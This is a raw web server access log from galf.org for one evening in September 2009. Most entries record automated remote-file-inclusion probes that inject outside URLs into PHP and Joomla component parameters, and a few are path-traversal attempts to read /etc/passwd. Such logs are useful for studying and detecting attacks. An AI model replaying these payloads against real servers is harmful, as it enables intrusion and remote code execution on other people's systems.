118.129.166.10 - - [20/Sep/2009:17:50:38 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.92.145.181 - - [20/Sep/2009:17:51:30 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:17:51:31 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:17:51:35 -0700] "GET /logs/access_090302.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:17:51:35 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:52:01 -0700] "GET /logs/access.log//sources/functions.php?CONFIG[main_path]=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.49.12 - - [20/Sep/2009:17:52:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.49.12 - - [20/Sep/2009:17:52:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.49.12 - - [20/Sep/2009:17:52:11 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.246.128.22 - - [20/Sep/2009:17:52:28 -0700] "GET /logs/access_090302.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:17:52:29 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:17:52:37 -0700] "GET /logs/access_090302.log//index.php?DOCUMENT_ROOT=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:17:52:37 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:17:59:14 -0700] "GET /?path%5Bdocroot%5D=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
65.55.51.70 - - [20/Sep/2009:17:59:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:02:04 -0700] "GET /logs///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:02:26 -0700] "GET /logs/access_090601.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:02:29 -0700] "GET /logs/access_090518.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:18:02:33 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:18:02:33 -0700] "GET /logs/access_090420.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:18:02:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:18:02:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:18:02:34 -0700] "GET /logs/access_090420.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:18:02:34 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:04:24 -0700] "GET /?go=%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:04:24 -0700] "GET /logs/?go=%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:18:06:05 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
116.125.113.119 - - [20/Sep/2009:18:06:05 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
116.125.113.119 - - [20/Sep/2009:18:06:05 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
65.246.128.22 - - [20/Sep/2009:18:12:35 -0700] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:12:35 -0700] "GET /?path%5Bdocroot%5D=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:12:35 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:16:12 -0700] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:17:30 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:17:30 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:18:17:58 -0700] "GET /logs//xfsection/modify.php?dir_module=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:18:17:58 -0700] "GET /logs/access_090420.log//xfsection/modify.php?dir_module=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:18:17:58 -0700] "GET /xfsection/modify.php?dir_module=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:18:20 -0700] "GET /logs/CAltInstaller.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:18:20 -0700] "GET /CAltInstaller.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:18:44 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:18:50 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:18:50 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:18:50 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:19:18 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:19:18 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:20:29 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:18:20:58 -0700] "GET /logs/access.log//components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
116.125.113.119 - - [20/Sep/2009:18:20:58 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
116.125.113.119 - - [20/Sep/2009:18:20:58 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
74.92.145.181 - - [20/Sep/2009:18:21:19 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
198.106.24.244 - - [20/Sep/2009:18:21:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.town-classifieds.com/adpics/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
198.106.24.244 - - [20/Sep/2009:18:21:59 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.town-classifieds.com/adpics/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
198.106.24.244 - - [20/Sep/2009:18:21:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.town-classifieds.com/adpics/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
74.92.145.181 - - [20/Sep/2009:18:22:02 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:22:36 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:23:26 -0700] "GET /logs/access_090420.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:23:26 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:23:26 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:23:29 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:23:29 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:23:29 -0700] "GET /logs/access_090420.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:23:55 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:24:44 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:18:24:44 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:18:24:44 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:18:24:44 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:18:24:54 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:18:24:54 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.61.164.40 - - [20/Sep/2009:18:26:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.galf.org/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
210.9.225.61 - - [20/Sep/2009:18:27:44 -0700] "GET /index.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.9.225.61 - - [20/Sep/2009:18:28:03 -0700] "GET /logs/index.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.9.225.61 - - [20/Sep/2009:18:28:04 -0700] "GET /logs/access_090720.log/index.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:28:27 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:29:15 -0700] "GET /install.serverstat.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:29:16 -0700] "GET /logs/install.serverstat.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
67.19.227.196 - - [20/Sep/2009:18:30:44 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
67.19.227.196 - - [20/Sep/2009:18:30:44 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:30:58 -0700] "GET /?pagina=%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:30:58 -0700] "GET /logs/?pagina=%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:31:35 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:31:35 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
67.19.227.196 - - [20/Sep/2009:18:31:37 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:31:43 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
67.19.227.196 - - [20/Sep/2009:18:31:58 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:32:08 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:32:13 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:32:16 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:32:34 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:32:34 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:32:36 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:32:36 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:32:39 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:32:40 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:32:41 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:32:41 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:32:41 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:32:57 -0700] "GET /Savant2_Plugin_options.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:32:57 -0700] "GET /logs/Savant2_Plugin_options.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
67.19.227.196 - - [20/Sep/2009:18:33:00 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:33:38 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:33:38 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:33:45 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:33:48 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
67.19.227.196 - - [20/Sep/2009:18:34:03 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:34:09 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:34:09 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:34:12 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:15 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:16 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:21 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:34:35 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:34:36 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:34:36 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:34:45 -0700] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:34:47 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:34:47 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:34:48 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.galf.org"
